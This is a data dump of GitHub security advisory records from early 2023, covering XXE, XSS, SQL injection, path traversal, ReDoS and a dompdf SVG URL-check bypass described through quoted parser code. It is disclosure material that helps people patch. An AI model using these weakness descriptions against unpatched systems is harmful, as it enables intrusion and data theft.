|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0671'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/0034681412057fef2dfe9cce9f8a6e3321f52edc'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c2a84917-7ac0-4169-81c1-b61e617023de'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T19:33:16Z', 'nvd_published_at': '2023-02-04T01:15:00Z'}
|
1.4.0
|
GHSA-9vx8-f5c4-862x
|
2023-03-31T14:27:12Z
|
2023-02-24T17:39:18Z
| null |
[]
|
XML External Entity (XXE) vulnerability in apoc.import.graphml
|
### Impact
A XML External Entity (XXE) vulnerability found in the apoc.import.graphml procedure of APOC core plugin in Neo4j graph database. XML External Entity (XXE) injection occurs when the XML parser allows external entities to be resolved. The XML parser used by the apoc.import.graphml procedure was not configured in a secure way and therefore allowed this.
External entities can be used to read local files, send HTTP requests, and perform denial-of-service attacks on the application.
Abusing the XXE vulnerability enabled assessors to read local files remotely. Although with the level of privileges assessors had this was limited to one-line files. With the ability to write to the database, any file could have been read. Additionally, assessors noted, with local testing, the server could be crashed by passing in improperly formatted XML.
### Patches
The users should aim to use the latest released version compatible with their Neo4j version. The minimum versions containing patch for this vulnerability is 4.4.0.14.
### Workarounds
If you cannot upgrade the library, you can control the [allowlist](https://neo4j.com/docs/operations-manual/current/reference/configuration-settings/#config_dbms.security.procedures.allowlist) of the procedures that can be used in your system.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [neo4j-apoc-procedures](https://github.com/neo4j-contrib/neo4j-apoc-procedures)
* Email us at [security@neo4j.com](mailto:security@neo4j.com)
### Credits
We want to publicly recognise the contribution of Christopher Schneider – State Farm.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/security/advisories/GHSA-9vx8-f5c4-862x'}, {'type': 'WEB', 'url': 'https://github.com/neo4j/apoc/security/advisories/GHSA-6wxg-wh7f-rqpr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23926'}, {'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/commit/c3e2a29020497acf9417879f38e8af4e8c6d5783'}, {'type': 'PACKAGE', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures'}, {'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/tag/4.4.0.14'}]
|
{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T17:39:18Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4jx2-hvqw-93j9
|
2023-03-02T18:39:18Z
|
2023-02-20T12:30:18Z
| null |
['CVE-2016-15026']
|
dd-plist XML External Entitly vulnerability
|
A vulnerability was found in 3breadt dd-plist 1.17 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. An attack has to be approached locally. Upgrading to version 1.18 is able to address this issue. The name of the patch is 8c954e8d9f6f6863729e50105a8abf3f87fff74c. It is recommended to upgrade the affected component. VDB-221486 is the identifier assigned to this vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.plist:dd-plist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-15026'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/pull/26'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/commit/8c954e8d9f6f6863729e50105a8abf3f87fff74c'}, {'type': 'PACKAGE', 'url': 'https://github.com/3breadt/dd-plist'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/releases/tag/dd-plist-1.18'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.221486'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.221486'}]
|
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:08:04Z', 'nvd_published_at': '2023-02-20T11:15:00Z'}
|
1.4.0
|
GHSA-8q38-w56m-qq2c
|
2023-02-14T21:26:39Z
|
2023-02-04T09:30:21Z
| null |
['CVE-2019-25101']
|
Header injection in TurboGears
|
A vulnerability classified as critical has been found in OnShift TurboGears 1.0.11.10. This affects an unknown part of the file turbogears/controllers.py of the component HTTP Header Handler. The manipulation leads to http response splitting. It is possible to initiate the attack remotely. Upgrading to version 1.0.11.11 is able to address this issue. The name of the patch is f68bbaba47f4474e1da553aa51564a73e1d92a84. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220059.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'TurboGears'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.11.11'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25101'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/pull/18'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/commit/f68bbaba47f4474e1da553aa51564a73e1d92a84'}, {'type': 'PACKAGE', 'url': 'https://github.com/OnShift/turbogears'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/releases/tag/v1.0.11.11'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220059'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220059'}]
|
{'cwe_ids': ['CWE-113'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:26:39Z', 'nvd_published_at': '2023-02-04T08:15:00Z'}
|
1.4.0
|
GHSA-x623-hr8h-7g5v
|
2023-02-10T22:32:39Z
|
2023-02-03T21:30:21Z
| null |
['CVE-2022-47762']
|
Path Traversal in gin-vue-admin
|
In gin-vue-admin < 2.5.5, the download module has a Path Traversal vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/flipped-aurora/gin-vue-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-47762'}, {'type': 'WEB', 'url': 'https://github.com/flipped-aurora/gin-vue-admin/issues/1309'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T22:32:39Z', 'nvd_published_at': '2023-02-03T21:15:00Z'}
|
1.4.0
|
GHSA-p64j-r5f4-pwwx
|
2023-02-06T23:38:18Z
|
2023-02-06T23:38:18Z
| null |
['CVE-2020-36067']
|
Improper Validation of Array Index in GJSON
|
GJSON < 1.6.6 allows attackers to cause a denial of service (panic: runtime error: slice bounds out of range) via a crafted GET call.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/tidwall/gjson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36067'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/196'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/bf4efcb3c18d1825b2988603dea5909140a5302b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tidwall/gjson'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0054'}]
|
{'cwe_ids': ['CWE-129'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T23:38:18Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-56gj-mvh6-rp75
|
2023-02-08T16:18:55Z
|
2023-02-07T18:16:23Z
| null |
['CVE-2023-24813']
|
URI validation failure on SVG parsing. Bypass of CVE-2023-23924
|
### Summary
Due to the difference in the attribute parser of Dompdf and php-svg-lib, an attacker can still call arbitrary URLs with arbitrary protocols.
### Details
Dompdf parses the href attribute of `image` tags with the following code:
[`src/Image/Cache.php` line 135-150](https://github.com/dompdf/dompdf/blob/2a8a6b80fcaa5148ace50f35a10979fe00c6a35d/src/Image/Cache.php#L135-L150)
``` php
function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) {
if (strtolower($name) === "image") {
$attributes = array_change_key_case($attributes, CASE_LOWER);
$url = $attributes["xlink:href"] ?? $attributes["href"];
if (!empty($url)) {
$inner_full_url = Helpers::build_url($parsed_url["protocol"], $parsed_url["host"], $parsed_url["path"], $url);
if ($inner_full_url === $full_url) {
throw new ImageException("SVG self-reference is not allowed", E_WARNING);
}
[$resolved_url, $type, $message] = self::resolve_url($url, $parsed_url["protocol"], $parsed_url["host"], $parsed_url["path"], $options);
if (!empty($message)) {
throw new ImageException("This SVG document references a restricted resource. $message", E_WARNING);
}
}
}
},
```
As you can see from the code snippet above, it respects `xlink:href` even if `href` is specified.
``` php
$url = $attributes["xlink:href"] ?? $attributes["href"];
```
However, php-svg-lib, which is later used to parse the svg file, parses the href attribute with the following code:
[`src/Svg/Tag/Image.php` line 51-57](https://github.com/dompdf/php-svg-lib/blob/76876c6cf3080bcb6f249d7d59705108166a6685/src/Svg/Tag/Image.php#L51-L57)
``` php
if (isset($attributes['xlink:href'])) {
$this->href = $attributes['xlink:href'];
}
if (isset($attributes['href'])) {
$this->href = $attributes['href'];
}
```
Since `href` is respected if both `xlink:href` and `href` is specified, it's possible to bypass the protection on the Dompdf side by providing an empty `xlink:href` attribute.
### Impact
An attacker can exploit the vulnerability to call arbitrary URLs with arbitrary protocols if they provide an SVG file to the Dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, which will lead, at the very least, to arbitrary file deletion and might lead to remote code execution, depending on available classes.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'dompdf/dompdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.2'}, {'fixed': '2.0.3'}]}], 'versions': ['2.0.2']}]
|
[{'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/security/advisories/GHSA-56gj-mvh6-rp75'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24813'}, {'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/commit/95009ea98230f9b084b040c34e3869ef3dccc9aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/dompdf/dompdf'}]
|
{'cwe_ids': ['CWE-436'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T18:16:23Z', 'nvd_published_at': '2023-02-07T19:15:00Z'}
|
1.4.0
|
GHSA-mc8h-8q98-g5hr
|
2023-02-24T16:23:59Z
|
2023-02-24T16:23:59Z
| null |
[]
|
Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all
|
The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.
Thanks to the Rust security team for identifying the problem and alerting us to it.
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'remove_dir_all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr'}, {'type': 'WEB', 'url': 'https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead'}, {'type': 'PACKAGE', 'url': 'https://github.com/XAMPPRocky/remove_dir_all'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0018.html'}]
|
{'cwe_ids': ['CWE-366', 'CWE-367'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:59Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q8gg-vj6m-hgmj
|
2023-03-03T00:11:24Z
|
2023-02-24T06:30:16Z
| null |
['CVE-2022-48345']
|
@braintree/sanitize-url Cross-site Scripting vulnerability
|
sanitize-url (aka @braintree/sanitize-url) before 6.0.1 allows XSS via HTML entities.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@braintree/sanitize-url'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48345'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/commit/d4bdc89f1743fe3cdb7c3f24b06e4c875f349b0c'}, {'type': 'PACKAGE', 'url': 'https://github.com/braintree/sanitize-url'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/compare/v6.0.0...v6.0.1'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/compare/v6.0.1...v6.0.2'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:15Z', 'nvd_published_at': '2023-02-24T06:15:00Z'}
|
1.4.0
|
GHSA-cf4g-fcf8-3cr9
|
2023-02-09T19:27:57Z
|
2023-02-09T19:27:57Z
| null |
[]
|
`pnet_packet` buffer overrun in `set_payload` setters
|
As indicated by this [issue](https://github.com/libpnet/libpnet/issues/449#issuecomment-663355987), a buffer overrun is possible in the `set_payload` setter of the various mutable "Packet" struct setters. The offending `set_payload` functions were defined within the struct `impl` blocks in earlier versions of the package, and later by the `packet` macro.
Fixed in the `packet` macro by [this](https://github.com/libpnet/libpnet/pull/455) PR.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'pnet_packet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/libpnet/libpnet/issues/449'}, {'type': 'PACKAGE', 'url': 'https://github.com/libpnet/libpnet'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0167.html'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-09T19:27:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vxpm-8hcp-qh27
|
2023-02-15T18:38:53Z
|
2023-02-03T21:07:28Z
| null |
['CVE-2023-23941']
|
Payment information sent to PayPal not necessarily identical to created order
|
### Impact
If JavaScript-based PayPal checkout methods are used (PayPal Plus, Smart Payment Buttons, SEPA, Pay Later, Venmo, Credit card), the amount and item list sent to PayPal may not be identical to the one in the created order.
### Patches
The problem has been fixed with version 5.4.4
### Workarounds
Disable the aforementioned payment methods or use the Security Plugin in version >= 1.0.21.
### References
[Shopware blog post](https://news.shopware.com/security-issue-in-paypal-plugin-update-required)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'swag/paypal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/shopware/SwagPayPal/security/advisories/GHSA-vxpm-8hcp-qh27'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23941'}, {'type': 'WEB', 'url': 'https://github.com/shopware/SwagPayPal/commit/57db5f4a57ef0a1646b509b415de9f03bf441b08'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/SwagPayPal'}]
|
{'cwe_ids': ['CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-03T21:07:28Z', 'nvd_published_at': '2023-02-03T21:15:00Z'}
|
1.4.0
|
GHSA-32gr-x76g-267w
|
2023-02-16T23:33:30Z
|
2023-02-10T15:30:28Z
| null |
['CVE-2015-10077']
|
SQL injection in webbuilders-group silverstripe-kapost-bridge
|
A vulnerability was found in webbuilders-group silverstripe-kapost-bridge 0.3.3. It has been declared as critical. Affected by this vulnerability is the function index/getPreview of the file code/control/KapostService.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 0.4.0 is able to address this issue. The name of the patch is 2e14b0fd0ea35034f90890f364b130fb4645ff35. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220471.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'webbuilders-group/silverstripe-kapost-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-10077'}, {'type': 'WEB', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge/commit/2e14b0fd0ea35034f90890f364b130fb4645ff35'}, {'type': 'PACKAGE', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge'}, {'type': 'WEB', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge/releases/tag/0.4.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220471'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220471'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T23:33:30Z', 'nvd_published_at': '2023-02-10T15:15:00Z'}
|
1.4.0
|
GHSA-xw5j-gv2g-mjm2
|
2023-02-14T21:53:37Z
|
2023-02-14T21:53:37Z
| null |
[]
|
Miscompilation in cortex-m-rt 0.7.1 and 0.7.2
|
Version 0.7.1 of the `cortex-m-rt` crate introduced a regression causing the stack to NOT be eight-byte aligned prior to calling `main` (or any other specified entrypoint), violating the [stack ABI of AAPCS32], the default ABI used by all Cortex-M targets. This regression is also present in version 0.7.2 of the `cortex-m-rt` crate.
This regression can cause certain compiler optimizations (which assume the eight-byte alignment) to produce incorrect behavior at runtime. This incorrect behavior has been [observed in real-world applications].
**It is advised that ALL users of `v0.7.1` and `v0.7.2` of the `cortex-m-rt` crate update to the latest version (`v0.7.3`), AS SOON AS POSSIBLE.** Users of `v0.7.0` and prior versions of `cortex-m-rt` are not affected by this regression.
It will be necessary to rebuild all affected firmware binaries, and flash or deploy the new firmware binaries to affected devices.
[stack ABI of AAPCS32]: https://github.com/ARM-software/abi-aa/blob/edd7460d87493fff124b8b5713acf71ffc06ee91/aapcs32/aapcs32.rst#6212stack-constraints-at-a-public-interface
[observed in real-world applications]: https://github.com/peter9477/test2
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'cortex-m-rt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.7.3'}]}]}]
|
[{'type': 'PACKAGE', 'url': 'https://github.com/rust-embedded/cortex-m'}, {'type': 'WEB', 'url': 'https://github.com/rust-embedded/cortex-m/discussions/469'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0014.html'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:53:37Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mhgm-52vg-pvvc
|
2023-02-16T14:12:04Z
|
2023-02-16T14:12:04Z
| null |
[]
|
Privilege escalation in Strongbox
|
### Impact
An attacker with read-only access to a Strongbox secret could craft a valid encrypted secret (same id/version). It also makes the audit logs from KMS less useful. The issue is caused by a bug in the underlying AWS Encryption SDK.
By default, the encrypted secrets are stored in DynamoDB and an attacker with read-only access would not be able to write the encrypted secret to DynamoDB. So in practice the impact should be limited for most users.
Strongbox supports storing data in files as an alternative to DynamoDB. If the attacker had write access to where the files are stored they could make the attack work end-to-end. Similarly, any custom storage backend could also be affected.
In order to be backwards compatible Strongbox will not make use of key commitments (another improvement to the AWS Encryption SDK). Strongbox enforces that only one KMS key can be used, and it must match the expected one. This means that an attacker needs write access to both KMS and DynamoDB (or other storage backend) to stage an attack, which is not a scenario Strongbox is designed to protect against.
### Patches
Fixed in version 0.5.0.
### Workarounds
None
### References
- https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r
- https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#key-commitment
|
[]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.schibsted.security:strongbox-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/schibsted/strongbox/security/advisories/GHSA-mhgm-52vg-pvvc'}, {'type': 'WEB', 'url': 'https://github.com/schibsted/strongbox/commit/e61f7c36efa898e8b44de6222cd66d2bcdd073e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/schibsted/strongbox'}]
|
{'cwe_ids': ['CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:12:04Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p9w8-2mpq-49h9
|
2023-02-14T16:47:13Z
|
2023-02-04T06:30:15Z
| null |
['CVE-2018-25079']
|
is-url Inefficient Regular Expression Complexity vulnerability
|
A vulnerability was found in Segmentio is-url up to 1.2.2. It has been rated as problematic. Affected by this issue is an unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. Upgrading to version 1.2.3 is able to address this issue. The name of the patch is 149550935c63a98c11f27f694a7c4a9479e53794. It is recommended to upgrade the affected component. VDB-220058 is the identifier assigned to this vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'is-url'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25079'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/pull/18'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/commit/149550935c63a98c11f27f694a7c4a9479e53794'}, {'type': 'PACKAGE', 'url': 'https://github.com/segmentio/is-url'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/releases/tag/v1.2.3'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220058'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220058'}]
|
{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T00:59:15Z', 'nvd_published_at': '2023-02-04T04:15:00Z'}
|
1.4.0
|
GHSA-rfhw-fm4m-52j6
|
2023-02-17T21:32:40Z
|
2023-02-10T21:30:24Z
| null |
['CVE-2023-0777']
|
Authentication Bypass in modoboa
|
Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0777'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html'}]
|
{'cwe_ids': ['CWE-305'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T22:31:45Z', 'nvd_published_at': '2023-02-10T19:15:00Z'}
|
1.4.0
|
GHSA-p7wj-c85f-xq9h
|
2023-02-16T21:52:22Z
|
2023-02-08T09:30:24Z
| null |
['CVE-2023-0741']
|
Answer has Cross-site Scripting vulnerability
|
Cross-site Scripting (XSS) - DOM in GitHub repository answerdev/answer prior to 1.0.4.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0741'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c3001de52af91f09c96e701facbce0b9fa0c98ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/78233bfa-871d-45e1-815f-dee73e397809'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:36:22Z', 'nvd_published_at': '2023-02-08T08:15:00Z'}
|
1.4.0
|
GHSA-hmfx-3pcx-653p
|
2023-02-16T17:38:22Z
|
2023-02-16T14:11:33Z
| null |
['CVE-2023-25173']
|
Supplementary groups are not set up properly in github.com/containerd/containerd
|
### Impact
A bug was found in containerd where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases, potentially gaining access to sensitive information or gaining the ability to execute code in that container.
Downstream applications that use the containerd client library may be affected as well.
### Patches
This bug has been fixed in containerd v1.6.18 and v.1.5.18. Users should update to these versions and recreate containers to resolve this issue. Users who rely on a downstream application that uses containerd's client library should check that application for a separate advisory and instructions.
### Workarounds
Ensure that the `"USER $USERNAME"` Dockerfile instruction is not used. Instead, set the container entrypoint to a value similar to `ENTRYPOINT ["su", "-", "user"]` to allow `su` to properly set up supplementary groups.
### References
- https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/
- Docker/Moby: CVE-2022-36109, fixed in Docker 20.10.18
- CRI-O: CVE-2022-2995, fixed in CRI-O 1.25.0
- Podman: CVE-2022-2989, fixed in Podman 3.0.1 and 4.2.0
- Buildah: CVE-2022-2990, fixed in Buildah 1.27.1
Note that CVE IDs apply to a particular implementation, even if an issue is common.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Email us at [security@containerd.io](mailto:security@containerd.io)
To report a security issue in containerd:
* [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new)
* Email us at [security@containerd.io](mailto:security@containerd.io)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.18'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.18'}]}]}]
|
